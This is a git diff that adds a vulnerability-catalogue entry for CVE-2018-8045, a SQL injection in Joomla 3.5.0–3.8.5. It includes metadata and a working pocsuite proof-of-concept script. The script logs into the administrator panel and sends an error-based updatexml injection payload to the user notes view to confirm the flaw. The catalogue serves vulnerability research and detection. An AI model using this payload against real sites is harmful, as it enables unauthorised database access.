diff --git a/cve/joomla/2018/CVE-2018-8045/README.md b/cve/joomla/2018/CVE-2018-8045/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..25e3cf94c58a11e3a769e24a169953eb063c9c70
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/README.md
@@ -0,0 +1,2 @@
+# CVE-2018-8045
+Joomla内核SQL注入漏洞原理及poc
\ No newline at end of file
diff --git a/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
new file mode 100644
index 0000000000000000000000000000000000000000..e7ae600dc18000840b610f87f495227cf7792687
--- /dev/null
+++ b/cve/joomla/2018/CVE-2018-8045/joomla_user_notes_sqli.py
@@ -0,0 +1,70 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import re
+import hashlib
+from pocsuite.api.request import req
+from pocsuite.api.poc import register
+from pocsuite.lib.core.data import logger
+from pocsuite.api.poc import Output, POCBase
+from pocsuite.api.utils import randomStr
+from pocsuite.lib.core.enums import CUSTOM_LOGGING
+from urlparse import urljoin
+
+
+class TestPOC(POCBase):
+    vulID = ''
+    version = ''
+    author = 'luckybool1020'
+
+    def get_pass(self, joomla_session):
+        if any(para not in self.params for para in ['user', 'passwd']):
+            logger.log(
+                CUSTOM_LOGGING.SYSINFO,
+                "You can use --extra-params=\"{'user': 'xxx','passwd': 'xxx'}\" to exec command")
+            return self.parse_output(None)
+        else:
+            user, passwd = self.params['user'], self.params['passwd']
+        url = urljoin(self.url, '/administrator/index.php')
+        content = joomla_session.get(url).content
+        re_para = '<input type="hidden" name="return" value="(.*?)"/>.*<input type="hidden" name="(.*?)" value="1" />'
+        match = re.findall(re_para, content, re.S)
+        if match:
+            value, token = match[0][0], match[0][1]
+        else:
+            return self.parse_output(None)
+        self.headers = {
+            "Content-Type": "application/x-www-form-urlencoded"
+        }
+        pass_payload = 'username={user}&passwd={passwd}&option=com_login&task=login&return={value}&{token}=1'.format(
+            user=user, passwd=passwd, value=value, token=token)
+        joomla_session.post(
+            url=url, params=None, headers=self.headers, data=pass_payload)
+
+    def _verify(self):
+        '''verify mode'''
+        result = {}
+        joomla_session = req.session()
+        self.get_pass(joomla_session)
+        rand_str = randomStr(10, "0123456789")
+        url = urljoin(self.url, '/administrator/index.php?option=com_users&view=notes')
+        sqli_payload = 'filter[search]=&list[fullordering]=a.review_time DESC&list[limit]=20&filter[published]=1&filter[category_id]=(updatexml(2,concat(0x7e,(md5({randstr}))),0))'.format(
+            randstr=rand_str)
+        r = joomla_session.post(url=url, headers=self.headers, data=sqli_payload)
+        if r.status_code == 500 and hashlib.md5(rand_str).hexdigest()[
+                0:31] in r.content:
+            result['VerifyInfo'] = {}
+            result['VerifyInfo']['URL'] = url
+        return self.parse_output(result)
+
+    _attack = _verify
+
+    def parse_output(self, result):
+        output = Output(self)
+        if result:
+            output.success(result)
+        else:
+            output.fail('Internet nothing returned')
+        return output
+
+
+register(TestPOC)
\ No newline at end of file
diff --git a/cve/joomla/2018/yaml/CVE-2018-8045.yaml b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..b19e536cf57fee6c0f46d19bdeba09cc15ca454f
--- /dev/null
+++ b/cve/joomla/2018/yaml/CVE-2018-8045.yaml
@@ -0,0 +1,21 @@
+id: CVE-2018-8045
+source:
+  https://github.com/luckybool1020/CVE-2018-8045
+info:
+  name: Joomla!是一套自由、开放源代码的内容管理系统，以PHP撰写，用于发布内容在万维网与内部网，通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等，还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件，使用GPL许可。
+  severity: high
+  description: 
+    在 Joomla！从3.5.0到3.8.5，SQL 语句中缺少变量类型转换导致用户注释列表视图中存在 SQL 注入漏洞。
+  scope-of-influence:
+    Joomla! 3.5.0 through 3.8.5
+  reference:
+    - https://developer.joomla.org/security-centre/723-20180301-core-sqli-vulnerability.html
+    - https://nvd.nist.gov/vuln/detail/cve-2018-8045
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2018-8045
+    cwe-id: CWE-89
+    cnvd-id: None
+    kve-id: None
+  tags: SQL注入
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9fdf2623ad2b75e42ebfe295c9b979dea2af2983..d6a5609bfcf89fcc34af0bef5b95aeba6dbd1d6b 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -149,6 +149,7 @@ cve:
     - CVE-2016-2107
   joomla:
     - CVE-2023-23752
+    - CVE-2018-8045
   libxml2:
     - CVE-2020-24977
     - CVE-2021-3517
